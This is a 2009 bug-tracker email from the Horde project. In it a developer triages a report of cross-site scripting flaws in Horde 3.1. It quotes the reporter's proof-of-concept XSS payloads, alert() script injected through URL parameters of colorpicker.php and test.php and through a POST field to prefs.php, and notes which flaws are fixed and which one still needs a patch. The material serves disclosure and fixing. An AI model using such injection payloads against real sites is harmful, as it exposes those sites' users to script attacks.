DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL:
http://bugs.horde.org/ticket/8399------------------------------------------------------------------------------
Ticket | 8399
Updated By | Chuck Hagenbuch <
chuck@...>
-Summary | Multiple Cross Site Scripting Vulnerabilities
+Summary | Number preferences are not validated properly
Queue | Horde Base
-Version | 3.1
+Version | HEAD
Type | Bug
-State | Unconfirmed
+State | Assigned
Priority | 2. Medium
-Milestone |
+Milestone | 3.3.5
Patch |
-Owners |
+Owners | Horde Developers, Chuck Hagenbuch
------------------------------------------------------------------------------
Chuck Hagenbuch <
chuck@...> (2009-07-11 17:08) wrote:
> Multiple cross site scripting vulnerabilites exist. Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable
version is 3.3, and we backport serious security fixes to 3.2.
>
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
>
https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>
This was fixed almost 2 years ago, before 3.2.0:
http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9> POST to
http://hordeserver.com/horde/services/prefs.php with the
> following content:
>
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
This I can actually reproduce as a problem. Patch forthcoming.
--
You are subscribed to this list as:
lists@...
To unsubscribe, mail:
bugs-unsubscribe@...
